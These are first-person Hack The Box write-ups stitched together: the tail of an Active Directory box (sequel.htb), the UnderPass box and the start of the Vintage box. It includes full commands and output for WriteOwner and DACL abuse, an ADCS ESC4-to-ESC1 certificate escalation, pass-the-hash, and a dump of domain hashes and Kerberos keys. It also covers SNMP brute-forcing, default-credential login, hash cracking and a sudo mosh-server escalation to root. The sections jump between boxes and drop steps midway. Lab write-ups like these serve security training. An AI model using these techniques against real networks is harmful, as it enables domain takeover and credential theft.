2. In the SQL2019 > ExpressAdv_ENU directory, I found the sql-Configuration.INI file which is the configuration file for the SQL Server setup. This file can be really juicy!
3. In the configuration file, I found a new password which is likely for user sql_svc. However, there is a possibility of this password being reused as well.
*Evil-WinRM* PS C:\Users\ryan\desktop> lsDirectory:C:\Users\ryan\desktopModeLastWriteTimeLengthName----------------------------ar---1/14/20259:38PM34user.txt*Evil-WinRM* PS C:\Users\ryan\desktop> type user.txt29d62fe*************************
Shell as Root
Reviewing BloodHound Graph
Whenever you pivot to a new user, it’s always a good practice to revisit the BloodHound Graphs. I marked ryan as owned & found that it has First Degree Object Control over ca_svc with WriteOwner privilege.
This means that ryan can modify or change the owner of ca_svc user account.
Theory Time!
First Degree Object Control
Every object in AD (e.g., users, groups, computers) has a Discretionary Access Control List (DACL). This DACL contains Access Control Entries (ACEs), which define who can do what to the object.
Normally, permissions are assigned to groups rather than individual users. However, if a user is explicitly listed in the ACEs of an object, it has First Degree Object Control over that object.
First Degree Object Control allows a user or group to directly control a target object in Active Directory, such as another user, group, or computer based on the permissions assigned to it via DACL of the target object. This control is independent of group membership. Even if the user is removed from all groups, it can still control that object.
WriteOwner Permission
Assume a user bob is listed in the DACL of another user john with writeowner permission. This means that bob can change the ownership of john‘s account to themselves or another principal. Once bob owns john‘s account, they can modify the DACL of john‘s account to grant themselves additional permissions, such as Reset Password or Full Control. This can be utilized by an attacker to move laterally.
Abusing WriteOwner
Step#1: Change the Owner
I used impacket-owneredit to change the owner of ca_svc user object to ryan.
croc@hacker$impacket-owneredit-actionwrite-new-owner'ryan'-target'ca_svc'-dc-ip10.10.11.51'sequel.htb/ryan:WqSZAF6CysDQbGb3'2>/dev/nullImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Current owner information below[*] - SID: S-1-5-21-548670397-972687484-3496335370-512[*] - sAMAccountName: Domain Admins[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb[*] OwnerSid modified successfully!
Step#2: Modify the DACL
I modified the permissions for Principal ryan to have full control over ca_svc object.
croc@hacker:~$impacket-dacledit-actionwrite-rights'FullControl'-principal'ryan'-target'ca_svc'-dc-ip'10.10.11.51''sequel.htb/ryan:WqSZAF6CysDQbGb3'2>/dev/nullImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] DACL backed up to dacledit-20250117-100801.bak[*] DACL modified successfully!
Step#3: Password Reset
Using bloodyAD, I changed the password for the ca_svc account.
The password reset was verified using nxc. Hence, we have full control over the ca_svc account.
However, note that there might be a scheduled task that resets everything because the authentication failed upon trying again after some time. So, repeat the above steps to change the password again when needed.
Way Forward
BloodHound
After owning the ca_svc account, I found that the ca_svc account is the part of the Cert Publishers Group.
Members of the Cert Publishers group are authorized to publish certificates for User objects in AD.
The documentation isn’t really clear but this necessarily means that the members of this group have write access to the userCertificate attribute of users and computers.
💡 Think Box
The username ca_svc is not a coincidence, we’re certainly meant to enumerate Active Directory Certificate Services (ADCS) as a Privilege Escalation path.
Enumerating AD CS
Identify AD CS
A quick way to verify the presence of AD CS is using netexec(works both for ryan and ca_svc):
croc@hacker:~$nxcldap10.10.11.51-uryan-pWqSZAF6CysDQbGb3-MadcsLDAP10.10.11.51389DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01)(domain:sequel.htb)LDAP10.10.11.51389DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 ADCS10.10.11.51389DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'ADCS10.10.11.51389DC01FoundPKIEnrollmentServer:DC01.sequel.htbADCS10.10.11.51389DC01FoundCN:sequel-DC01-CA
It finds the same CA as we found in our nmap scan, confirming the presence of AD CS.
Identify Vulnerable Template
I used certipy-ad to enumerate the enabled and vulnerable certificate templates with the password of Pass@1234 we set above for ca_svc:
croc@hacker$certipy-adfind-u'ca_svc'-p'Pass@1234'-dc-ip10.10.11.51-enabled-vulnerableCertipyv4.8.2-byOliverLyak (ly4k)[*] Finding certificate templates[*] Found 34 certificate templates[*] Finding certificate authorities[*] Found 1 certificate authority[*] Found 12 enabled certificate templates[*] Trying to get CA configuration for'sequel-DC01-CA' via CSRA[!] Got error whiletryingtogetCAconfigurationfor'sequel-DC01-CA'viaCSRA:CASessionError:code:0x80070005-E_ACCESSDENIED-Generalaccessdeniederror.[*] Trying to get CA configuration for'sequel-DC01-CA' via RRP[!] Failed to connect to remote registry. Service should be starting now. Trying again...[*] Got CA configuration for'sequel-DC01-CA'[*] Saved BloodHound data to '20250116105636_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k[*] Saved text output to '20250116105636_Certipy.txt'[*] Saved JSON output to '20250116105636_Certipy.json'
A template named DunderMifflinAuthentication was detected of being vulnerable to ESC4 vulnerability:
1. ESC4 is when a user or a group has write privileges over a certificate template. ca_svc is the user in this case that has write privileges to the DunderMifflinAuthentication certificate template.
2. This, for instance, allows the user to overwrite the configuration of the certificate template to make the template vulnerable to ESC1. This is done by by enabling the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit in the mspki-certificate-name-flag property.
3. Now being vulnerable to ESC1, we can set an arbitrary SAN and request a certificate as the administrative user.
The tool certipy-ad will do that for us by default. The -save-old parameter allows to save the old configuration, which is useful for restoring the configuration afterwards.
croc@hacker$certipy-adtemplate-u'ca_svc'-password'Pass@1234'-dc-ip10.10.11.51-templateDunderMifflinAuthentication-save-oldCertipyv4.8.2-byOliverLyak (ly4k)[*] Saved old configuration for'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'[*] Updating certificate template 'DunderMifflinAuthentication'[*] Successfully updated 'DunderMifflinAuthentication'
Now, if I enumerate the certificate templates again, I found the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT to be true making it vulnerable to ESC1:
We can now specify an arbitrary SAN as Administrator@sequel.htb using the -upn flag and request a certificate as the administrative user:
croc@hacker$certipy-adreq-u'ca_svc'-p'Pass@1234'-dc-ip'10.10.11.51'-template'DunderMifflinAuthentication'-upn'Administrator@sequel.htb'-ca'sequel-DC01-CA'Certipyv4.8.2-byOliverLyak (ly4k)[*] Requesting certificate via RPC[*] Successfully requested certificate[*] Request ID is 26[*] Got certificate with UPN 'Administrator@sequel.htb'[*] Certificate has no object SID[*] Saved certificate and private key to 'administrator.pfx'
Step#3: Authenticate with Domain Admin Certificate
We authenticated using the admin certificate and got his NTLM Hash:
croc@hacker$certipy-adauth-pfxadministrator.pfx-dc-ip10.10.11.51Certipyv4.8.2-byOliverLyak (ly4k)[*] Using principal: administrator@sequel.htb[*] Trying to get TGT...[*] Got TGT[*] Saved credential cache to 'administrator.ccache'[*] Trying to retrieve NT hash for'administrator'[*] Got hash for'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
Step#4: Revert the Changes
Although there is a scheduled task which resets everything but still we can see how we can restore the old configuration of the certificate template:
croc@hacker$impacket-psexecadministrator@10.10.11.51-hashesaad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ffImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Requesting shares on 10.10.11.51.....[-] share 'Accounting Department' is not writable.[*] Found writable share ADMIN$[*] Uploading file EDYbflMh.exe[*] Opening SVCManager on 10.10.11.51.....[*] Creating service Ivmh on 10.10.11.51.....[*] Starting service Ivmh.....[!] Press help for extra shell commandsMicrosoftWindows [Version 10.0.17763.6640](c) 2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>
root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> lsDirectory:C:\Users\Administrator\desktopModeLastWriteTimeLengthName----------------------------ar---1/17/20254:41AM34root.txt*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt54f6209*************************
Post Root
NTDS.dit
I dumped the ntds.dit using secretsdump:
croc@hacker$impacket-secretsdumpadministrator@10.10.11.51-hashesaad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ffImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Target system bootKey: 0x07057881f4c9d60499fd59bba9ae4929[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.[*] Dumping cached domain logon information (domain/username:hash)[*] Dumping LSA Secrets[*] $MACHINE.ACC SEQUEL\DC01$:aes256-cts-hmac-sha1-96:cb5c43b6d92bb097d345a545f324f9caa4d6ef91c2f0267ecfc7ed76546a9df3SEQUEL\DC01$:aes128-cts-hmac-sha1-96:eef978409ad7a2a86eef37f48de21850SEQUEL\DC01$:des-cbc-md5:a892b025a1684ad9SEQUEL\DC01$:plain_password_hex:799d42a4c9050c328e8bbdb7b93568b68c2b048291ccac285099a2029e7b37203a70ee818c14657a0048716ce61598e844de25b002668bf9b304071dbe5b681f8afb6b981f7ace9727b8dc45c4463f3be8ccbe7e8fd2948d677dc03ed85e5f6e903834c1c228969f7030294347ec4c57f6319edabb47b0efb564aba7f5f195e9a6815bb27fd69a4cf235d4df93f2c34a79978ade6e068c7e7e46eb1129a9e67dff6dfea58a354e6627309facd710b354fb66dcea17c845604bae941ce39fc49a3af7dc3d14bdc16d7f9c56ce9ef6243144c7ee18cf4664e5003a6c86073811a7866e70b130134934b09abd09a7964390SEQUEL\DC01$:aad3b435b51404eeaad3b435b51404ee:66ad063789d27b459aeaf39372dc628a:::[*] DefaultPassword SEQUEL\Administrator:n3KuDVzUicepJ0Bm[*] DPAPI_SYSTEM dpapi_machinekey:0x38bfbe5761658576a78af7d4c26e7a8a1422848adpapi_userkey:0x3adfe88507630dfd1f8a91a579d015f2427d1016[*] NL$KM 0000 D4 CD C5 D0 C1 CB 45 04 6C EA 54 2E 91 E1 C3 2D ......E.l.T....- 0010 88 26 C2 04 00 30 F1 16 71 C1 DE A5 19 96 71 E2 .&...0..q.....q. 0020 BB C7 38 D7 A4 25 6E 36 F0 2C 68 85 38 3E FD B1 ..8..%n6.,h.8>.. 0030 7E 3C 11 DC 3A 56 41 DC 6A 8F 32 D3 A3 F4 D8 5F ~<..:VA.j.2...._NL$KM:d4cdc5d0c1cb45046cea542e91e1c32d8826c2040030f11671c1dea5199671e2bbc738d7a4256e36f02c6885383efdb17e3c11dc3a5641dc6a8f32d3a3f4d85f[*] _SC_MSSQL$SQLEXPRESS SEQUEL\sql_svc:WqSZAF6CysDQbGb3[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretsAdministrator:500:aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1acb6bdf708cb2e0b6802e77649e55cc:::sequel.htb\michael:1103:aad3b435b51404eeaad3b435b51404ee:cafe5ec3c162eaf0d46e3013b0d71dba:::sequel.htb\ryan:1114:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::sequel.htb\oscar:1116:aad3b435b51404eeaad3b435b51404ee:97504ea3a7ca31b7d91e26ef82e3e383:::sequel.htb\sql_svc:1122:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::sequel.htb\rose:1601:aad3b435b51404eeaad3b435b51404ee:0e0b8e0b06c681da8c3f1f17e53a4a56:::sequel.htb\ca_svc:1607:aad3b435b51404eeaad3b435b51404ee:3b181b914e7a9d5508ea1e20bc2b7fce:::DC01$:1000:aad3b435b51404eeaad3b435b51404ee:66ad063789d27b459aeaf39372dc628a:::[*] Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:968abd11086022e97f88b30a22b0053b8ea85ba3ec7219073b2348412befd4a7Administrator:aes128-cts-hmac-sha1-96:89e80e336f0e4e6cfc86bd492c6cad83Administrator:des-cbc-md5:b0a4ad1a98311334krbtgt:aes256-cts-hmac-sha1-96:fb9766744ab94559541847d2984c9831c815992e1070309a5cbc88c76b56f0cdkrbtgt:aes128-cts-hmac-sha1-96:f365950f1fe180450832470e1695d44ckrbtgt:des-cbc-md5:5db9c2fd578a1cd3sequel.htb\michael:aes256-cts-hmac-sha1-96:e93493d0476db7d001d5f3b2ae25595b602bedc7108eaced0044748f6413a860sequel.htb\michael:aes128-cts-hmac-sha1-96:8b8a6f85d95763c9c3fd721e8e33a270sequel.htb\michael:des-cbc-md5:86bc0b2c3b5b5eecsequel.htb\ryan:aes256-cts-hmac-sha1-96:676bd0149bfc8f193967991eaec21fc0af77c2364c360f363507e3d647bca2a8sequel.htb\ryan:aes128-cts-hmac-sha1-96:4fff4b149f767c81378c977d14c5070csequel.htb\ryan:des-cbc-md5:1929372c084fdcd0sequel.htb\oscar:aes256-cts-hmac-sha1-96:d0497357f3dfcbdcd80878db9ea6829f556b5eb25b3f8cbbe0416ae0223577bfsequel.htb\oscar:aes128-cts-hmac-sha1-96:f4856b529096b1dbf3a6037ae501ce23sequel.htb\oscar:des-cbc-md5:102f08dfb3d0c71fsequel.htb\sql_svc:aes256-cts-hmac-sha1-96:3e9f4068aa26eebec597f04014f93846c5bd9d5b47a6acc89f16dafda3d620dbsequel.htb\sql_svc:aes128-cts-hmac-sha1-96:c3cd53730282eea99772bceb78cdf485sequel.htb\sql_svc:des-cbc-md5:9b1357d3aea186b6sequel.htb\rose:aes256-cts-hmac-sha1-96:f904a8eccae44567647e727118655b0e83ba8055c873dc3060c8b2d6fbcc4660sequel.htb\rose:aes128-cts-hmac-sha1-96:efe028112c8b1662dea3a876c3fae28asequel.htb\rose:des-cbc-md5:0d9b13cbf88aa44fsequel.htb\ca_svc:aes256-cts-hmac-sha1-96:d820f67f11df4ac5d4e22e9aafb7c8f2c07ea7491f06b8569d712a6eb9cf8ceasequel.htb\ca_svc:aes128-cts-hmac-sha1-96:42d45fb86f8b69ba9b66bc195412aa15sequel.htb\ca_svc:des-cbc-md5:405b7f263723626bDC01$:aes256-cts-hmac-sha1-96:cb5c43b6d92bb097d345a545f324f9caa4d6ef91c2f0267ecfc7ed76546a9df3DC01$:aes128-cts-hmac-sha1-96:eef978409ad7a2a86eef37f48de21850DC01$:des-cbc-md5:c7b908f27919a854[*] Cleaning up...
Without valid credentials, SSH is not a viable entry point. Therefore, the primary attack surface is HTTP, where an Apache2 web server is running with a default page.
nmap/UDP
I usually also kick off a UDP Scan alongside the TCP Scan. Since UDP scans can be slow, I limited the scan to the top 50 ports to reduce the time taken.
nmap finds SNMP being open on port 161 which can be quite juicy!
croc@hacker$sudonmap-sU--top-ports50-T3-oNUDPScanunderpass.htbStartingNmap7.94SVN ( https://nmap.org ) at 2024-12-25 01:17 ESTNmapscanreportforunderpass.htb (10.10.11.48)Hostisup (0.27s latency).PORTSTATESERVICE161/udpopensnmpNmapdone:1IPaddress (1 hostup) scanned in 51.12 seconds
Website – 80/TCP
Main Page
We have an apache default web page as we have already seen that in our scan:
Directory Busting
Directory enumeration did not reveal any notable findings. Most of the found directories are 403 and index.html where we have a 200 is not an unusual thing for an Apache Web Server.
With such a limited attack surface, it’s worthwhile to explore UDP.
Finding the Community String
In order to interact with SNMP, a community string is required which functions as a password to authenticate us. It’s really common to have a community string of public for stuff that is meant to be public & it’s a good bet to start by guessing that. But, there’s also a tool called onesixtyone built-in into kali which tries a bunch of common community strings against a host. Let’s try running it:
croc@hacker$onesixtyone10.10.11.48-c/usr/share/doc/onesixtyone/dict.txtScanning1hosts,50communities10.10.11.48 [public] Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Utilizing the list of common community strings provided with the tool, we found out that our target host is indeed using public as the community string.
Another approach is to use the Nmap Scripting Engine (NSE) with the snmp-brute script to enumerate the community string.
croc@hacker:~$sudonmap-sU-p161--script=snmp-brute--min-rate500underpass.htbStartingNmap7.95 ( https://nmap.org ) at 2025-02-22 07:47 ESTNmapscanreportforunderpass.htb (10.10.11.48)Hostisup (0.28s latency).PORTSTATESERVICE161/udpopensnmp|snmp-brute:|_public-ValidcredentialsNmapdone:1IPaddress (1 hostup) scanned in 12.86 seconds
snmpbulkwalk/snmpwalk
We can utilize snmpwalk or snmpbulkwalk in order to enumerate SNMP. But before doing that, there’s one more thing to look into.
SNMP uses a hierarchical numbering scheme to label data it holds. There’s an addon package that converts it into a more readable format. We can set it up by apt install snmp-mibs-downloader and commenting out the following line in /etc/snmp/snmp.conf file:
Now, I used snmpbulkwalk to enumerate snmp using the community string of public. This revealed a username of steve@underpass.htb and the use of a daloradius server.
We can use snmp-check for that same purpose as well for more structured output:
croc@hacker$snmp-check-cpublic-v2c10.10.11.48snmp-checkv1.9-SNMPenumeratorCopyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)[+] Try to connect to 10.10.11.48:161 using SNMPv2c and community 'public'[*] System information:HostIPaddress:10.10.11.48Hostname:UnDerPass.htbistheonlydaloradiusserverinthebasin!Description:Linuxunderpass5.15.0-126-generic136-UbuntuSMPWedNov610:38:22UTC2024x86_64Contact:steve@underpass.htbLocation:Nevada,U.S.A.butnotVegasUptimesnmp:02:09:58.97Uptimesystem:02:09:45.95Systemdate:2025-1-202:36:45.0[*] Network information:DefaultTTL:noSuchObjectTCPsegmentsreceived:noSuchObjectTCPsegmentssent:noSuchObjectTCPsegmentsretrans:noSuchObjectInputdatagrams:noSuchObjectDelivereddatagrams:noSuchObjectOutputdatagrams:noSuchObject[*] File system information:Index:noSuchObjectMountpoint:noSuchObjectAccess:noSuchObjectBootable:noSuchObject
Now, what??
daloRADIUS is a web-based management interface for managing a RADIUS(Remote Authentication Dial-In User Service) Server but specifically it manages FreeRADIUS and it’s database structure, a widely used open-source RADIUS Server.
💡 Think Box
The mention of “daloradius” strongly suggests that the target has a RADIUS management service, likely running on the web server (port 80) we already have.
A Hunch, but Well-Thought
/daloradius
I got a 403 forbidden which tells me that this is most probably the root directory for daloradius web application.
Directory Brute Force
Let’s bust subdirectories for /daloradius and hope for the best:
croc@hacker$sudoferoxbuster-uhttp://underpass.htb/daloradius-w/usr/share/seclists/Discovery/Web-Content/big.txt___________________|__|__|__) |__) |/`/\ \_/ ||\|__||___|\|\|\__,\__/ / \ ||__/|___by Ben "epi" Risher 🤓 ver: 2.10.4───────────────────────────┬──────────────────────🎯 Target Url │ http://underpass.htb/daloradius🚀 Threads │ 50📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/big.txt👌 Status Codes │ All Status Codes!💥 Timeout (secs) │ 7🦡 User-Agent │ feroxbuster/2.10.4💉 Config File │ /etc/feroxbuster/ferox-config.toml🔎 Extract Links │ true🏁 HTTP methods │ [GET]🔃 Recursion Depth │ 4🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴──────────────────────🏁 Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────403 GET 9l 28w 278c Auto-filtering found 404-like response and created new filter;toggle off with --dont-filter404 GET 9l 31w 275c Auto-filtering found 404-like response and created new filter;toggle off with --dont-filter301 GET 9l 28w 319c http://underpass.htb/daloradius => http://underpass.htb/daloradius/200 GET 412l 3898w 24703c http://underpass.htb/daloradius/ChangeLog200 GET 340l 2968w 18011c http://underpass.htb/daloradius/LICENSE301 GET 9l 28w 323c http://underpass.htb/daloradius/app => http://underpass.htb/daloradius/app/301 GET 9l 28w 327c http://underpass.htb/daloradius/contrib => http://underpass.htb/daloradius/contrib/301 GET 9l 28w 323c http://underpass.htb/daloradius/doc => http://underpass.htb/daloradius/doc/301 GET 9l 28w 330c http://underpass.htb/daloradius/app/common => http://underpass.htb/daloradius/app/common/301 GET 9l 28w 330c http://underpass.htb/daloradius/contrib/db => http://underpass.htb/daloradius/contrib/db/301 GET 9l 28w 327c http://underpass.htb/daloradius/library => http://underpass.htb/daloradius/library/301 GET 9l 28w 325c http://underpass.htb/daloradius/setup => http://underpass.htb/daloradius/setup/301 GET 9l 28w 331c http://underpass.htb/daloradius/doc/install => http://underpass.htb/daloradius/doc/install/301 GET 9l 28w 333c http://underpass.htb/daloradius/app/operators => http://underpass.htb/daloradius/app/operators/301 GET 9l 28w 339c http://underpass.htb/daloradius/app/common/includes => http://underpass.htb/daloradius/app/common/includes/301 GET 9l 28w 338c http://underpass.htb/daloradius/app/common/library => http://underpass.htb/daloradius/app/common/library/301 GET 9l 28w 335c http://underpass.htb/daloradius/contrib/scripts => http://underpass.htb/daloradius/contrib/scripts/301 GET 9l 28w 340c http://underpass.htb/daloradius/app/common/templates => http://underpass.htb/daloradius/app/common/templates/301 GET 9l 28w 341c http://underpass.htb/daloradius/app/operators/include => http://underpass.htb/daloradius/app/operators/include/301 GET 9l 28w 338c http://underpass.htb/daloradius/app/operators/lang => http://underpass.htb/daloradius/app/operators/lang/301 GET 9l 28w 341c http://underpass.htb/daloradius/app/operators/library => http://underpass.htb/daloradius/app/operators/library/301 GET 9l 28w 347c http://underpass.htb/daloradius/app/operators/notifications => http://underpass.htb/daloradius/app/operators/notifications/301 GET 9l 28w 348c http://underpass.htb/daloradius/app/operators/include/common => http://underpass.htb/daloradius/app/operators/include/common/301 GET 9l 28w 348c http://underpass.htb/daloradius/app/operators/include/config => http://underpass.htb/daloradius/app/operators/include/config/301 GET 9l 28w 347c http://underpass.htb/daloradius/contrib/scripts/maintenance => http://underpass.htb/daloradius/contrib/scripts/maintenance/301 GET 9l 28w 340c http://underpass.htb/daloradius/app/operators/static => http://underpass.htb/daloradius/app/operators/static/301 GET 9l 28w 352c http://underpass.htb/daloradius/app/operators/library/extensions => http://underpass.htb/daloradius/app/operators/library/extensions/301 GET 9l 28w 352c http://underpass.htb/daloradius/app/operators/include/management => http://underpass.htb/daloradius/app/operators/include/management/301 GET 9l 28w 346c http://underpass.htb/daloradius/app/operators/include/menu => http://underpass.htb/daloradius/app/operators/include/menu/301 GET 9l 28w 344c http://underpass.htb/daloradius/app/operators/static/css => http://underpass.htb/daloradius/app/operators/static/css/301 GET 9l 28w 355c http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor => http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor/301 GET 9l 28w 347c http://underpass.htb/daloradius/app/operators/static/images => http://underpass.htb/daloradius/app/operators/static/images/301 GET 9l 28w 348c http://underpass.htb/daloradius/app/operators/library/tables => http://underpass.htb/daloradius/app/operators/library/tables/301 GET 9l 28w 357c http://underpass.htb/daloradius/app/operators/notifications/templates => http://underpass.htb/daloradius/app/operators/notifications/templates/[####################] - 24m 409646/409646 0s found:32 errors:66265 [####################] - 8m 20477/20477 41/s http://underpass.htb/daloradius/ [####################] - 10m 20477/20477 35/s http://underpass.htb/daloradius/app/ [####################] - 9m 20477/20477 37/s http://underpass.htb/daloradius/contrib/ [####################] - 10m 20477/20477 36/s http://underpass.htb/daloradius/doc/ [####################] - 10m 20477/20477 33/s http://underpass.htb/daloradius/app/common/ [####################] - 10m 20477/20477 33/s http://underpass.htb/daloradius/contrib/db/ [####################] - 11m 20477/20477 31/s http://underpass.htb/daloradius/library/ [####################] - 11m 20477/20477 31/s http://underpass.htb/daloradius/setup/ [####################] - 13m 20477/20477 26/s http://underpass.htb/daloradius/app/operators/ [####################] - 12m 20477/20477 28/s http://underpass.htb/daloradius/doc/install/ [####################] - 13m 20477/20477 26/s http://underpass.htb/daloradius/app/common/includes/ [####################] - 12m 20477/20477 28/s http://underpass.htb/daloradius/app/common/library/ [####################] - 13m 20477/20477 27/s http://underpass.htb/daloradius/contrib/scripts/ [####################] - 11m 20477/20477 30/s http://underpass.htb/daloradius/app/common/templates/ [####################] - 11m 20477/20477 30/s http://underpass.htb/daloradius/app/operators/include/ [####################] - 11m 20477/20477 32/s http://underpass.htb/daloradius/app/operators/lang/ [####################] - 11m 20477/20477 32/s http://underpass.htb/daloradius/app/operators/library/
Expand
/app/operators
Navigating to /daloradius/app/operators, I was redirected to the daloradius login page.
Something that I want you to note here is the difference between the version of the application listed here on the login page and the ChangeLog entry below:
Identifying the correct version is crucial while looking for exploits and CVEs. The version on the login page is certainly the most accurate in my opinion. However, it’s not required for solving this box.
Default Credentials
Whenever I see a login page, my first go-to is default credentials as they’re just too common. I found the following default credentials in the GitHub Repo:
I tried the default credentials and it worked flawlessly:
We have one user in the users list. I found a user named svcMosh with a what looks like a MD5 hashed password.
Shell as svcMosh
Hash Cracking
First of all, we must confirm the hash type using hash-identifier:
Hurrah!! We successfully cracked the password! Have some dance lol!
SSH
With ssh being open and a pair of credentials, we can try to gain initial access:
croc@hacker$ ssh svcMosh@10.10.11.48svcMosh@10.10.11.48's password: Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Wed Jan 1 04:31:04 PM UTC 2025 System load: 0.05 Processes: 230 Usage of /: 96.5% of 3.75GB Users logged in: 1 Memory usage: 17% IPv4 address for eth0: 10.10.11.48 Swap usage: 0% => / is using 96.5% of 3.75GBExpanded Security Maintenance for Applications is not enabled.0 updates can be applied immediately.Enable ESM Apps to receive additional future security updates.See https://ubuntu.com/esm or run: sudo pro statusThe list of available updates is more than a week old.To check for new updates run: sudo apt updateFailed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settingsLast login: Wed Jan 1 16:21:17 2025 from 10.10.16.17svcMosh@underpass:~$
The first things that I am looking into after gaining a foothold on a linux box are quick wins like history where there may be a password, sudo permissions or SUID/SGID Binaries.
Sudo Privileges
I found that the user svcMosh has passwordless sudo privileges to execute the /usr/bin/mosh-server command as any user, including root.
In simple words, mosh is the modern replacement of SSH. Since SSH relies on the TCP protocol, which maintains a session bound to a specific IP address, it struggles with connectivity issues when switching networks or experiencing interruptions. Mosh addresses this limitation by using UDP and application-level sessions, ensuring a stable connection even during network changes.
Normally, if we have the target user’s password and mosh installed on the target device, we can just connect to it and it does everything for us. We can see this in action as well.
Install mosh on your Kali Machine by apt install mosh. Then, we can just connect as the svcMosh user because we have his password.
croc@hacker:~$moshsvcMosh@10.10.11.48Theauthenticityofhost'10.10.11.48 (<no hostip for proxy command>)'can't be established.ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.11.48' (ED25519) to the list of known hosts.svcMosh@10.10.11.48'spassword:
What it will do is establish a session over SSH & run the mosh-server on the target. After the server starts, SSH disconnects, and the client switches to UDP for communication.
So, we got a shell as svcMosh user. But in order to do this for the root user, we need to have his password which we don’t have currently. So, we’ll take a different route which is the manual way of doing it.
Run the Mosh Server
Manually run the mosh-server on the target box. It will connect to a high UDP port on the local machine. As soon as the client connects to this port, it executes the user’s login shell. As we have sudo permissions over mosh-server, we can expect to get a shell as root user.
And, we got root! Congratulations(to me of course 😂)!
Time-sensitive Connection Requirement
Now, make sure that you connect to the mosh-server within 60 seconds of running it. Otherwise, the server will go down automatically & you will see the following error while connecting using mosh-client:
The $y$ specifies the Yescrypt algorithm which is an advanced hashing algorithm designed to provide enhanced security and performance. Hashcat doesn’t support yescrypt so, I used john to crack this hash.
However, this was going extremely slow so I aborted the session.
I found a ssh id_rsa private key in the /root/.ssh directory and I copied it to the current directory. Next, I spined up a python web server in the same directory:
A STATUS_NOT_SUPPORTED error appeared while connecting to the SMB Server. This is most likely because the SMB server does not support the authentication method being used.
croc@hacker$impacket-smbclient'vintage.htb'/'P.Rosa':'Rosaisbest123'@10.10.11.45Impacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[-] SMB SessionError: code: 0xc00000bb - STATUS_NOT_SUPPORTED - The request is not supported.
On the other hand, I tried Kerberos Authentication and it worked like a charm. However, we don’t have access to any useful shares.
croc@hacker$impacket-smbclient'vintage.htb'/'P.Rosa':'Rosaisbest123'@DC01.vintage.htb-kImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[-] CCache file is not found. Skipping...Typehelpforlistofcommands# sharesADMIN$C$IPC$NETLOGONSYSVOL#
💡 Think Box
I suspect that NTLM authentication is disabled on this box, making Kerberos authentication a requirement.
Ldapdomaindump – 389/TCP
Ldapdomaindump has two authentication modes: SIMPLE and NTLM(default). As NTLM is disabled, I tried using the SIMPLE authentication mode and it worked. This type of authentication utilizes a username and a password sent in clear text unless encrypted with SSL/TLS.
croc@hacker$sudo/usr/bin/ldapdomaindumpldap://10.10.11.45-u'VINTAGE\P.Rosa'-p'Rosaisbest123'-atSIMPLE[*] Connecting to host...[*] Binding to host[+] Bind OK[*] Starting domain dump[+] Domain dump finishedcroc@hacker$lsdomain_computers_by_os.htmldomain_groups.grepdomain_policy.htmldomain_trusts.jsondomain_users.jsondomain_computers.grepdomain_groups.htmldomain_policy.jsondomain_users_by_group.htmldomain_computers.htmldomain_groups.jsondomain_trusts.grepdomain_users.grepdomain_computers.jsondomain_policy.grepdomain_trusts.htmldomain_users.html
I found C.Neri_adm to be a Remote Desktop User which may allow RDP access if we pivot to this user.
There are a bunch of service accounts as well that might allow kerberoasting:
We also have a couple of Remote management users as well that could lead us to WinRM access:
Several computer accounts were also found:
Since the Account Lockout Threshold is set to 0, we’re good password spraying:
💡 Think Box
